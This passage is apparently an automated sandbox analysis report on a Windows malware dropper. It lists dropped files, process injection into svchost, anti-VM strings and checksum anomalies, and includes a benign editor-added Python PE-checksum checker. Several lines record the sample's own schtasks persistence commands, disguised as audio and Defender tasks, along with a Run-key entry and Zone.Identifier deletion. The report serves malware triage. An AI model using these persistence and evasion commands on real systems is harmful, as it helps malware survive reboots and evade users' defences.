Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_0041A02C push 0041A05Ch; ret
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_0040E8D0 push 0040E905h; ret
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_0040B164 push 0040B190h; ret
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_0040E908 push 0040E94Ah; ret
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_0040B12C push 0040B158h; ret
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_0040C136 push 0040C164h; ret
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_0040C138 push 0040C164h; ret
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_0040813C push 00408174h; ret
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_004171E8 push 00417214h; ret
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_0040C9EA push 0040CA18h; ret
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_0040C9EC push 0040CA18h; ret
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_0040E1A4 push 0040E1D0h; ret
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_0040B1B8 push 0040B1E4h; ret
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_0040E25A push 0040E288h; ret
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_0040E25C push 0040E288h; ret
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_00414A28 push 00414A84h; ret
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_0040BAB8 push 0040BAE4h; ret
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_00409B54 push 00409BC8h; ret
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_00409B78 push 00409BC8h; ret
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 1_2_00DB4B37 LoadLibraryA,GetProcAddress,
Source: windef.exe.1.dr Static PE information: real checksum: 0x0 should be: 0x60aad
Source: SystemPropertiesPerformance.exe.1.dr Static PE information: real checksum: 0x110ada should be: 0x208fb2
Source: winsock.exe.6.dr Static PE information: real checksum: 0x0 should be: 0x60aad
Source: vnc.exe.10.dr Static PE information: real checksum: 0x0 should be: 0x657b3
Source: CVbJSUXraQ.exe Static PE information: real checksum: 0x110ada should be: 0x209217
Source: vnc.exe.1.dr Static PE information: real checksum: 0x0 should be: 0x657b3
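The "real checksum ... should be" rows compare the CheckSum field in the optional header with the value computed over the file. Two patterns are worth separating: a stored value of 0x0 (windef.exe, winsock.exe, vnc.exe) means the linker never filled the field, which is common for .NET and unsigned native builds and is only a weak signal on its own; a non-zero stored value that does not match (0x110ada against 0x209217 for CVbJSUXraQ.exe and 0x208fb2 for SystemPropertiesPerformance.exe, the same stored value on two files of slightly different size) indicates the image was modified after linking, which is what appending a payload to a prebuilt stub looks like. The block below is an added example by the editor, not code from the sandbox or the sample; it implements the documented PE checksum (the value imagehlp's CheckSumMappedFile returns) and exercises it on a constructed, non-loadable header-only image.

```python
"""PE CheckSum verification: the check behind the report's "real checksum ... should be" rows.

Added example, not code from the sandbox or the sample. compute_pe_checksum() is the
documented PE checksum: a 16-bit end-around-carry sum over the whole file, skipping the
CheckSum field itself, plus the file length. build_minimal_pe() constructs a header-only
image (not loadable) just large enough to exercise the routine.
"""
import struct


def pe_checksum_offset(data):
    """File offset of IMAGE_OPTIONAL_HEADER.CheckSum: e_lfanew + 4 (signature) + 20 (COFF) + 64."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    return e_lfanew + 4 + 20 + 64


def compute_pe_checksum(data):
    off = pe_checksum_offset(data)
    if off % 4:
        raise ValueError("unaligned optional header")
    padded = data + b"\0" * (-len(data) % 4)      # sum in dwords; pad the tail, not the length
    total = 0
    for i in range(0, len(padded), 4):
        if i == off:                               # the field being computed does not count
            continue
        total += struct.unpack_from("<I", padded, i)[0]
        if total >= 1 << 32:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)      # fold the 32-bit sum to 16 bits
    total = (total + (total >> 16)) & 0xFFFF
    return total + len(data)


def verify_pe_checksum(data):
    """Return (status, stored, computed); status is 'unset', 'ok' or 'mismatch'."""
    stored = struct.unpack_from("<I", data, pe_checksum_offset(data))[0]
    computed = compute_pe_checksum(data)
    if stored == 0:
        status = "unset"          # linker never wrote one: common, weak signal on its own
    elif stored == computed:
        status = "ok"
    else:
        status = "mismatch"       # file changed after linking: patched, appended to, or a reused stub
    return status, stored, computed


def build_minimal_pe(checksum_value=0, payload=b"\x90" * 16):
    """Constructed PE32 header (DOS stub + signature + COFF + 224-byte optional header) plus payload."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                             # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 0xE0, 0x0102)   # i386, no sections, 0xE0 optional header
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                              # PE32 magic
    struct.pack_into("<I", opt, 64, checksum_value)                    # CheckSum field
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + payload


if __name__ == "__main__":
    image = build_minimal_pe()
    print(verify_pe_checksum(image))
    fixed = build_minimal_pe(checksum_value=compute_pe_checksum(image))
    print(verify_pe_checksum(fixed))
```

Run against the dropped files, the function reproduces the sandbox's "should be" column; the interesting triage question is not the mismatch itself but whether the stored value is zero (never set) or stale (set, then the file was altered).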
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe File created: C:\Users\user\btpanui\SystemPropertiesPerformance.exe
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe File created: C:\Users\user\AppData\Local\Temp\vnc.exe
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe File created: C:\Users\user\AppData\Local\Temp\windef.exe
Source: C:\Users\user\AppData\Local\Temp\windef.exe File created: C:\Users\user\AppData\Roaming\SubDir\winsock.exe

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F
Source: C:\Users\user\AppData\Local\Temp\windef.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run win defender run

Hooking and other Techniques for Hiding and Protection:

Icon mismatch, binary includes an icon from a different legit application in order to fool users
Source: initial sample | Icon embedded in binary file: icon matches a legit application icon: download (31).png
Uses known network protocols on non-standard ports
Source: unknown | Network traffic detected: HTTP traffic on port 49743 -> 8000
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\AppData\Local\Temp\windef.exe | File opened: C:\Users\user\AppData\Local\Temp\windef.exe:Zone.Identifier read attributes | delete
Source: C:\Users\user\AppData\Local\Temp\windef.exe | File opened: C:\Users\user\AppData\Roaming\SubDir\winsock.exe:Zone.Identifier read attributes | delete
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 1_2_00DB48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C83CC0 IsIconic,GetLastActivePopup,OpenClipboard,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,CloseClipboard,
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C8143C IsIconic,GetLastActivePopup,
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C821C8 IsIconic,
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C7CDE8 IsIconic,memset,GetWindow,GetWindow,
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C7B764 GetWindowLongPtrA,IsIconic,
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_00DB48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Code function: 10_2_00A448D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_00DD3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\windef.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\windef.exe TID: 4128 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\windef.exe TID: 5872 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\windef.exe | Thread delayed: delay time: 922337203685477
Source: SystemPropertiesPerformance.exe, 0000000A.00000002.941562165.00000000017DC000.00000004.00000001.sdmp | Binary or memory string: vmtoolsd.exe
Source: svchost.exe, 00000005.00000000.720666690.0000020DCBE1F000.00000004.00000001.sdmp, windef.exe, 00000006.00000002.720199755.0000000005849000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 1_2_00DB49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 1_2_00E1445A GetFileAttributesW,FindFirstFileW,FindClose,
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C7FDA0 memset,lstrlenW,lstrlenW,HeapAlloc,lstrcpyW,lstrcatW,lstrcatW,memset,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,DeleteFileW,FindNextFileW,FindClose,lstrcpyW,lstrcatW,lstrcatW,memset,RemoveDirectoryW,
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C76554 memset,lstrlenW,HeapAlloc,lstrcpyW,lstrcatW,memset,FindFirstFileW,lstrlenW,HeapAlloc,lstrcpyW,lstrcatW,SetLastError,FindNextFileW,FindClose,SetLastError,
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C7FFA8 memset,lstrlenW,HeapAlloc,lstrcpyW,lstrcatW,lstrlenW,HeapAlloc,lstrcpyW,CreateDirectoryW,GetLastError,FindFirstFileW,GetLastError,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,HeapFree,
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_00E1445A GetFileAttributesW,FindFirstFileW,FindClose,
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_00413030 FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_004119A8 FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_004119AC FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_00412D6C FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_0041160C FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Code function: 10_2_00AA445A GetFileAttributesW,FindFirstFileW,FindClose,
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 1_2_00DB4B37 LoadLibraryA,GetProcAddress,
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 1_3_037F00BE mov esi, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_00407AF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Code function: 10_3_014C00BE mov esi, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 1_2_00DB3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 1_2_00DE5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 1_2_00DE97A2 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,
Source: C:\Users\user\AppData\Local\Temp\windef.exe | Process token adjusted: Debug
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C9A002 LdrLoadDll,
Source: C:\Users\user\AppData\Local\Temp\windef.exe | Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 1_2_00DDA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_00DDA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Code function: 10_2_00A6A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\Temp\vnc.exe | Section loaded: unknown target: C:\Windows\System32\svchost.exe protection: execute and read and write
Allocates memory in foreign processes
Source: C:\Users\user\AppData\Local\Temp\vnc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: D00000 protect: page execute and read and write
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Memory written: C:\Users\user\Desktop\CVbJSUXraQ.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Memory written: C:\Users\user\btpanui\SystemPropertiesPerformance.exe base: 400000 value starts with: 4D5A
Contains functionality to inject code into remote processes
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 1_3_037F00BE CreateProcessW,GetThreadContext,ReadProcessMemory,VirtualAlloc,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualProtectEx,VirtualFree,WriteProcessMemory,SetThreadContext,ResumeThread,
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\Temp\vnc.exe | Memory written: C:\Windows\System32\svchost.exe base: 7FF6EB844380
Source: C:\Users\user\AppData\Local\Temp\vnc.exe | Memory written: C:\Windows\System32\svchost.exe base: D00000
.NET source code references suspicious native API functions
Source: winsock.exe.6.dr, u218f?uf56e???ufffd????u25e0??????u20e0uf421.cs | Reference to suspicious API methods: ('????????????????????', 'LoadLibrary@kernel32.dll'), ('????????????????????', 'GetProcAddress@kernel32.dll')
Source: winsock.exe.6.dr, ??uf019??u2720???uf88au171b???????u222f?.cs | Reference to suspicious API methods: ('????????????????????', 'MapVirtualKeyEx@user32.dll')
Source: 6.0.windef.exe.f10000.0.unpack, u218f?uf56e???ufffd????u25e0??????u20e0uf421.cs | Reference to suspicious API methods: ('????????????????????', 'LoadLibrary@kernel32.dll'), ('????????????????????', 'GetProcAddress@kernel32.dll')
Source: 6.0.windef.exe.f10000.0.unpack, ??uf019??u2720???uf88au171b???????u222f?.cs | Reference to suspicious API methods: ('????????????????????', 'MapVirtualKeyEx@user32.dll')
Source: 6.2.windef.exe.f10000.0.unpack, ??uf019??u2720???uf88au171b???????u222f?.cs | Reference to suspicious API methods: ('????????????????????', 'MapVirtualKeyEx@user32.dll')
Source: 6.2.windef.exe.f10000.0.unpack, u218f?uf56e???ufffd????u25e0??????u20e0uf421.cs | Reference to suspicious API methods: ('????????????????????', 'LoadLibrary@kernel32.dll'), ('????????????????????', 'GetProcAddress@kernel32.dll')
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\vnc.exe | Thread register set: target process: 5200
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 1_2_00DB48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Process created: C:\Users\user\AppData\Local\Temp\vnc.exe 'C:\Users\user\AppData\Local\Temp\vnc.exe'
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe'
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Process created: C:\Users\user\Desktop\CVbJSUXraQ.exe C:\Users\user\Desktop\CVbJSUXraQ.exe
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F
Source: C:\Users\user\AppData\Local\Temp\vnc.exe | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k
Source: C:\Users\user\AppData\Local\Temp\windef.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks' /create /tn 'win defender run' /sc ONLOGON /tr 'C:\Users\user\AppData\Local\Temp\windef.exe' /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\windef.exe | Process created: C:\Users\user\AppData\Roaming\SubDir\winsock.exe C:\Users\user\AppData\Roaming\SubDir\winsock.exe
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Process created: C:\Users\user\AppData\Local\Temp\vnc.exe 'C:\Users\user\AppData\Local\Temp\vnc.exe'
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe'
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Process created: C:\Users\user\btpanui\SystemPropertiesPerformance.exe C:\Users\user\btpanui\SystemPropertiesPerformance.exe
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 1_2_00DB3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 1_2_00E0874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,
Source: CVbJSUXraQ.exe, 00000001.00000000.668612321.0000000000E64000.00000002.00020000.sdmp, CVbJSUXraQ.exe, 00000007.00000002.939474482.0000000000E64000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000000.695369238.0000000000AF4000.00000002.00020000.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: CVbJSUXraQ.exe, 00000001.00000002.944287940.0000000002350000.00000002.00020000.sdmp, vnc.exe, svchost.exe, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp | Binary or memory string: Program Manager
Source: CVbJSUXraQ.exe, SystemPropertiesPerformance.exe | Binary or memory string: Shell_TrayWnd
Source: CVbJSUXraQ.exe, 00000001.00000003.684502731.0000000001805000.00000004.00000001.sdmp, vnc.exe, svchost.exe, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp | Binary or memory string: GetProgmanWindow
Source: CVbJSUXraQ.exe, 00000001.00000002.944287940.0000000002350000.00000002.00020000.sdmp, vnc.exe, svchost.exe, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp | Binary or memory string: Progman
Source: CVbJSUXraQ.exe, 00000001.00000002.944287940.0000000002350000.00000002.00020000.sdmp, svchost.exe, 00000005.00000000.720749842.0000020DCC390000.00000002.00020000.sdmp, CVbJSUXraQ.exe, 00000007.00000002.942639016.0000000001DD0000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000002.942828030.00000000029A0000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
Source: CVbJSUXraQ.exe, 00000001.00000002.944000384.00000000016FA000.00000004.00000001.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000002.941562165.00000000017DC000.00000004.00000001.sdmp | Binary or memory string: [CLASS:Progman]
Source: SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp | Binary or memory string: explorerframe.dllshell32.dllexplorer.exewindows.immersiveshell.serviceprovider.dlltwinui.dllwpncore.dllauthui.dllpnidui.dllhgcpl.dllBINotifiedNewSessionEventStartMenuCacheFileReorderShellReadyEventShellDesktopSwitchEventwindows.immersiveshell.serviceprovider.dllCreateDesktopExACreateDesktopExWOpenDesktopAOpenDesktopWOpenInputDesktopSwitchDesktopSetThreadDesktopGetUserObjectInformationAGetUserObjectInformationWFlashWindowExFlashWindowGetCaretBlinkTimeTrackPopupMenuExSetShellWindowSetShellWindowExGetShellWindowSetTaskmanWindowGetTaskmanWindowSetProgmanWindowGetProgmanWindowSystemParametersInfoWSystemParametersInfoAgdi32.dllSetDIBitsToDeviceBitBltWinmm.dllPlaySoundAPlaySoundWsndPlaySoundAsndPlaySoundWBeepMessageBeepwaveOutOpendsound.dllDirectSoundCreateDirectSoundCaptureCreateDirectSoundFullDuplexCreate8DirectSoundFullDuplexCreateDirectSoundCreate8DirectSoundCaptureCreate8LoadLibraryWLoadLibraryExALoadLibraryExWGetProcAddressRegQueryValueExWRegGetValueWntdll.dllZwRaiseHardErrorNtRaiseHardErrorZwConnectPortNtConnectPortShell32.dllSHRestrictedSHGetSetSettingsUxTheme.dllSetThemeAppPropertiesDefWindowProcWDefWindowProcADefDlgProcWDefDlgProcADefFrameProcWDefFrameProcADefMDIChildProcWDefMDIChildProcACallWindowProcWCallWindowProcAGetMessageWGetMessageAPeekMessageWPeekMessageATranslateMessageGetCursorPosd3d10_1.dllSetCursorPosd3d10_1core.dlld3d10.dlld3d10core.dlld2d1.dllGetMessagePosOPENGL32.dlld3d9.dlld3d11.dllDxtrans.dllSetCaptureFlash6.ocxReleaseCaptureGetCaptureCreateDesktopACreateDesktopWCreateDXGIFactory1D3D10CreateDevice1Direct3DCreate9Direct3DCreate9Ex\ThemeApiPortRtlSetUnhandledExceptionFilterMessageBoxTimeoutAuser32Program ManagerProgmanSHELLDLL_DefViewFolderViewSysListView32Shell_TrayWndNotifyIconOverflowWindow/0#32770MSTaskSwWClassTrayNotifyWndtaskmgrversion.dllGetFileVersionInfoSizeWGetFileVersionInfoW1.3.6.1.4.1.311.2.1.12rY
Source: SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp | Binary or memory string: explorerframe.dllshell32.dllexplorer.exewindows.immersiveshell.serviceprovider.dlltwinui.dllwpncore.dllauthui.dllpnidui.dllhgcpl.dllBINotifiedNewSessionEventStartMenuCacheFileReorderShellReadyEventShellDesktopSwitchEventwindows.immersiveshell.serviceprovider.dllDefWindowProcWDefWindowProcADefDlgProcWDefDlgProcADefFrameProcWDefFrameProcADefMDIChildProcWDefMDIChildProcACallWindowProcWCallWindowProcAGetMessageWGetMessageAPeekMessageWPeekMessageATranslateMessageGetCursorPosd3d10_1.dllSetCursorPosd3d10_1core.dlld3d10.dlld3d10core.dlld2d1.dllGetMessagePosOPENGL32.dlld3d9.dlld3d11.dllDxtrans.dllSetCaptureFlash6.ocxReleaseCaptureGetCaptureCreateDesktopACreateDesktopWCreateDesktopExACreateDesktopExWOpenDesktopAOpenDesktopWOpenInputDesktopSwitchDesktopSetThreadDesktopGetUserObjectInformationAGetUserObjectInformationWFlashWindowExFlashWindowGetCaretBlinkTimeTrackPopupMenuExSetShellWindowSetShellWindowExGetShellWindowSetTaskmanWindowGetTaskmanWindowSetProgmanWindowGetProgmanWindowSystemParametersInfoWSystemParametersInfoAgdi32.dllSetDIBitsToDeviceBitBltWinmm.dllPlaySoundAPlaySoundWsndPlaySoundAsndPlaySoundWBeepMessageBeepwaveOutOpendsound.dllDirectSoundCreateDirectSoundCaptureCreateDirectSoundFullDuplexCreate8DirectSoundFullDuplexCreateDirectSoundCreate8DirectSoundCaptureCreate8LoadLibraryWLoadLibraryExALoadLibraryExWGetProcAddressRegQueryValueExWRegGetValueWntdll.dllZwRaiseHardErrorNtRaiseHardErrorZwConnectPortNtConnectPortShell32.dllSHRestrictedSHGetSetSettingsUxTheme.dllSetThemeAppPropertiesCreateDXGIFactory1D3D10CreateDevice1Direct3DCreate9Direct3DCreate9Ex\ThemeApiPortRtlSetUnhandledExceptionFilterMessageBoxTimeoutAuser32Program ManagerProgmanSHELLDLL_DefViewFolderViewSysListView32Shell_TrayWndNotifyIconOverflowWindow/0#32770MSTaskSwWClassTrayNotifyWndtaskmgr\version.dllGetFileVersionInfoSizeWGetFileVersionInfoW1.3.6.1.4.1.311.2.1.12rY
